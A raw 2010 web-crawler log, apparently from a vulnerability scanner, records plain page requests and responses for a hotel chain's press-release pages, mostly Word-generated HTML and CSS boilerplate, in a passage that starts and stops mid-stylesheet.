328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; mso-ansi-font-size:8.0pt; font-family:Symbol;}@list l2 {mso-list-id:102651134; mso-list-type:hybrid; mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l3 {mso-list-id:154613679; mso-list-type:hybrid; mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l4 {mso-list-id:533346185; mso-list-type:hybrid; mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}@list l4:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5 {mso-list-id:806508694; mso-list-type:hybrid; mso-list-template-ids:-2137327588 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l5:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6 {mso-list-id:973101145; mso-list-type:hybrid; mso-list-template-ids:135307080 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Symbol;}@list l7 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Calibri;}@list l7:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8 {mso-list-id:1089353841; mso-list-template-ids:-304692582;}@list l8:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Wingdings;}@list l8:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9 {mso-list-id:1488857345; mso-list-type:hybrid; mso-list-template-ids:-1802839462 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l9:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l9:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10 {mso-list-id:1566069662; mso-list-type:hybrid; mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l10:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l11 {mso-list-id:1636525908; mso-list-type:hybrid; mso-list-template-ids:2135300666 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l11:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:none; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l12 {mso-list-id:1765494741; mso-list-type:hybrid; mso-list-template-ids:-1093994450 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l12:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt;..
- /pdfs/press/html/Summer-of-Pride-0510/index.html

/pdfs/press/html/Summer-of-Pride-0510/index.html

http://www.kimptonhotels.com/pdfs/press/html/Summer-of-Pride-0510/index.html

Request

GET /pdfs/press/html/Summer-of-Pride-0510/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 35075
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>2</o:TotalTime> <o:LastPrinted>2010-05-10T18:00:00Z</o:LastPrinted> <o:Created>2010-05-10T18:01:00Z</o:Created> <o:LastSaved>2010-05-10T18:01:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>750</o:Words> <o:Characters>4280</o:Characters> <o:Lines>35</o:Lines> <o:Paragraphs>8</o:Paragraphs> <o:CharactersWithSpaces>5256</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:50331648 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-bidi-font-weight:bold;}h2 {mso-style-next:Normal; margin-top:12.0pt; margin-right:0in; margin-bottom:3.0pt; margin-left:0in; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:2; font-size:14.0pt; font-family:Arial; mso-bidi-font-family:Arial; mso-bidi-font-weight:bold; font-style:italic;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoBodyText3, li.MsoBodyText3, div.MsoBodyText3 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}em {mso-bidi-font-style:italic;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;}span.emailstyle17 {mso-style-name:emailstyle17; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:windowtext;}span.kim10 {mso-style-name:kim10;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:1007153; mso-list-type:hybrid; mso-list-template-ids:-1871125328 1670048874 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; mso-ansi-font-size:8.0pt; font-family:Symbol;}@list l2 {mso-list-id:102651134; mso-list-type:hybrid; mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l3 {mso-list-id:154613679; mso-list-type:hybrid; mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l4 {mso-list-id:533346185; mso-list-type:hybrid; mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}@list l4:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5 {mso-list-id:806508694; mso-list-type:hybrid; mso-list-template-ids:-2137327588 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l5:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6 {mso-list-id:973101145; mso-list-type:hybrid; mso-list-template-ids:135307080 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Symbol;}@list l7 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Calibri;}@list l7:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8 {mso-list-id:1089353841; mso-list-template-ids:-304692582;}@list l8:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Wingdings;}@list l8:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9 {mso-list-id:1488857345; mso-list-type:hybrid; mso-list-template-ids:-1802839462 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l9:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l9:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10 {mso-list-id:1566069662; mso-list-type:hybrid; mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l10:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l11 {mso-list-id:1636525908; mso-list-type:hybrid; mso-list-template-ids:2135300666 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l11:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:none; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l12 {mso-list-id:1765494741; mso-list-type:hybrid; mso-list-template-ids:-1093994450 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l12:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt;..
- /pdfs/press/html/MMHIQ4-0410/

/pdfs/press/html/MMHIQ4-0410/

http://www.kimptonhotels.com/pdfs/press/html/MMHIQ4-0410/

Request

GET /pdfs/press/html/MMHIQ4-0410/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/MMHIQ4-0410/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 21068
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author>Marliese Engel</o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>2</o:TotalTime> <o:LastPrinted>2010-04-28T18:29:00Z</o:LastPrinted> <o:Created>2010-04-28T18:29:00Z</o:Created> <o:LastSaved>2010-04-28T18:29:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>676</o:Words> <o:Characters>3858</o:Characters> <o:Company>Baltz &amp; Company</o:Company> <o:Lines>32</o:Lines> <o:Paragraphs>7</o:Paragraphs> <o:CharactersWithSpaces>4737</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:CustomDocumentProperties> <o:_NewReviewCycle dt:dt="string"></o:_NewReviewCycle> </o:CustomDocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> 